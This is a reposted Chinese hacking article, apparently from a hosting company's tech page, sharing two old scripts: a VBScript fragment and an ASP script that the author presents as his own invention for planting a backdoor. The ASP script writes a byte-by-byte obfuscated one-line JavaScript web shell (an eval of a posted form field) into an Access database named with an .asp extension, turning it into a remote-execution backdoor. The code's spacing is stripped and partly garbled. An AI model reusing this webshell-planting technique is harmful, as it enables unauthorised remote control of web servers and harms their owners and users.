N年前的两个脚本%5c暴库
作者 佚名
来源 ASP编程
浏览
发布时间 2013-07-09
| ToStr&CStr(vNum) EndFunction FunctionGetSplit(unStr,vaStr,Mode) aTemp=Split(unStr,vaStr) bTemp=Ubound(aTemp) SelectCaseMode Case-1:GetSplit=aTemp Case-2:GetSplit=bTemp EndSelect IfMode<0ThenExitFunction IfMode>bTempThenGetSplit=False:ExitFunction IfMode>=0ThenGetSplit=aTemp(Mode) EndFunction FunctionOpenWin(vTTv) SetIE=WScript.CreateObject("InternetExplorer.Application") IE.Navigate"about:blank" IE.Visible=1 IE.ToolBar=0 IE.StatusBar=0 IE.Width=500 IE.Height=335 DoWhile(IE.Busy):Loop SetDoc=IE.Document Doc.Open Execute"Doc.Writeln"&Chr(34)&vTTv&Chr(34) Doc.Close SetIE=Nothing EndFunction 另一个是我写的,向access里插入asp代码来当作后门,这应当是我的首创了,不过我也不知其他人有没有更早提前发现的。后来网上就流传开直接向数据库插入一句话来得到webshell。不知不觉时光飞逝,4年过去了,人老了,难道只能怀旧吗? <% db="0123.asp"''这里改成您的数据库地址 setconn=server.createobject("Adodb.Connection") connstr="Provider=Microsoft.Jet.OLEDB.4.0;DataSource="&Server.MapPath(db) conn.openconnstr ''添加notdownload表 conn.execute("createtablenotdownload(notdownoleobject)") ''写入<%数据 setrs=server.createobject("adodb.recordset") sql="select*fromnotdownload" rs.opensql,conn,1,3 rs.addnew rs("notdown").appendchunk(chrB(asc("<"))&chrB(asc("s"))&chrB(asc("c"))&chrB(asc("r"))&chrB(asc("i"))&chrB(asc("p"))&chrB(asc("t"))&chrB(asc(""))&chrB(asc("r"))&chrB(asc("u"))&chrB(asc("n"))&chrB(asc("a"))&chrB(asc("t"))&chrB(asc("="))&chrB(asc("s"))&chrB(asc("e"))&chrB(asc("r"))&chrB(asc("v"))&chrB(asc("e"))&chrB(asc("r"))&chrB(asc(""))&chrB(asc("l"))&chrB(asc("a"))&chrB(asc("n"))&chrB(asc("g"))&chrB(asc("u"))&chrB(asc("a"))&chrB(asc("g"))&chrB(asc("e"))&chrB(asc("="))&chrB(asc("j"))&chrB(asc("a"))&chrB(asc("v"))&chrB(asc("a"))&chrB(asc("s"))&chrB(asc("c"))&chrB(asc("r"))&chrB(asc("i"))&chrB(asc("p"))&chrB(asc("t"))&chrB(asc(">"))&chrB(asc("e"))&chrB(asc("v"))&chrB(asc("a"))&chrB(asc("l"))&chrB(asc("("))&chrB(asc("r"))&chrB(asc("e"))&chrB(asc("q"))&chrB(asc("u"))&chrB(asc("e"))&chrB(asc("s"))&chrB(asc("t"))&chrB(asc("."))&chrB(asc("f"))&chrB(asc("o"))&chrB(asc("r"))&chrB(asc("m"))&chrB(asc("("))&chrB(asc("''"))&chrB(asc("#"))&chrB(asc("''"))&chrB(asc(")"))&chrB(asc("+"))&chrB(asc("''"))&chrB(asc("''"))&chrB(asc(")"))&chrB(asc("<"))&chrB(asc("/"))&chrB(asc("s"))&chrB(asc("c"))&chrB(asc("r"))&chrB(asc("i"))&chrB(asc("p"))&chrB(asc("t"))&chrB(asc(">"))) rs.update rs.close setrs=nothing ''关闭连接 conn.close setconn=nothing %> |
凌众科技专业提供服务器租用、服务器托管、企业邮局、虚拟主机等服务,公司网站:http://www.lingzhong.cn 为了给广大客户了解更多的技术信息,本技术文章收集来源于网络,凌众科技尊重文章作者的版权,如果有涉及你的版权有必要删除你的文章,请和我们联系。以上信息与文章正文是不可分割的一部分,如果您要转载本文章,请保留以上信息,谢谢! |
你可能对下面的文章感兴趣
关于N年前的两个脚本%5c暴库的所有评论
